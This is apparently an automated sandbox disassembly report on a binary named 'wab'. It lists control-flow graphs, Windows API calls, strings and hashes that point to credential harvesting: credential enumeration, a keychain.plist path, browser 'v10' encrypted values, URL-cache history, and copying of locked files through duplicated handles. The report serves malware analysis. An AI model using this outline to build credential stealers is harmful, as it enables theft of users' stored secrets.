413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004455C2
                                                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                                                  • memset.MSVCRT ref: 0044570D
                                                                                  • memset.MSVCRT ref: 00445725
                                                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                    • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                    • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                  • memset.MSVCRT ref: 0044573D
                                                                                  • memset.MSVCRT ref: 00445755
                                                                                  • memset.MSVCRT ref: 004458CB
                                                                                  • memset.MSVCRT ref: 004458E3
                                                                                  • memset.MSVCRT ref: 0044596E
                                                                                  • memset.MSVCRT ref: 00445A10
                                                                                  • memset.MSVCRT ref: 00445A28
                                                                                  • memset.MSVCRT ref: 00445AC6
                                                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                  • memset.MSVCRT ref: 00445B52
                                                                                  • memset.MSVCRT ref: 00445B6A
                                                                                  • memset.MSVCRT ref: 00445C9B
                                                                                  • memset.MSVCRT ref: 00445CB3
                                                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                                                  • memset.MSVCRT ref: 00445B82
                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                  • memset.MSVCRT ref: 00445986
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                  • API String ID: 2745753283-3798722523
                                                                                  • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                  • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                  • API String ID: 2744995895-28296030
                                                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                  • memcmp.MSVCRT ref: 0040B9BF
                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                  • memcpy.MSVCRT ref: 0040BB66
                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                  • String ID: chp$v10
                                                                                  • API String ID: 170802307-2783969131
                                                                                  • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                  • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 512 40e304-40e316 call 406e8f 510->512 516 40e476-40e483 call 406b53 512->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->512 524->509 530 40e497-40e49f ??3@YAXPAX@Z 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 555 40e3c3-40e3c6 550->555 551->552 553 40e416-40e427 memcpy 552->553 554 40e42a-40e42f 552->554 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                  APIs
                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                                                  • memcpy.MSVCRT ref: 0040E3EC
                                                                                  • memcpy.MSVCRT ref: 0040E407
                                                                                  • memcpy.MSVCRT ref: 0040E422
                                                                                  • memcpy.MSVCRT ref: 0040E43D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                  • API String ID: 3073804840-2252543386
                                                                                  • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                  • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                  • String ID:
                                                                                  • API String ID: 3715365532-3916222277
                                                                                  • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                  • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                    • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                  • String ID: bhv
                                                                                  • API String ID: 327780389-2689659898
                                                                                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                  APIs
                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                  • API String ID: 2941347001-70141382
                                                                                  • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                  • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 701 44671d-446726 699->701 702 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->702 704 446747-44674b 701->704 705 446728-44672d 701->705 710 4467ac-4467b7 __setusermatherr 702->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 702->711 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 709 446755-446758 706->709 708->700 712 44673d-446745 708->712 709->702 710->711 715 446810-446819 711->715 716 44681e-446825 711->716 712->709 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 722 446834-446838 718->722 723 44683a-44683e 718->723 720 446845-44684b 719->720 721 446872-446877 719->721 725 446853-446864 GetStartupInfoW 720->725 726 44684d-446851 720->726 721->719 722->718 722->723 723->720 727 446840-446842 723->727 729 446866-44686a 725->729 730 446879-44687b 725->730 726->725 726->727 727->720 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                  • String ID:
                                                                                  • API String ID: 2827331108-0
                                                                                  • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                  • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040C298
                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                  • wcschr.MSVCRT ref: 0040C324
                                                                                  • wcschr.MSVCRT ref: 0040C344
                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                  • String ID: visited:
                                                                                  • API String ID: 1157525455-1702587658
                                                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 ??3@YAXPAX@Z 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                                                                                  APIs
                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                  • API String ID: 3883404497-2982631422
                                                                                  • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                  • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
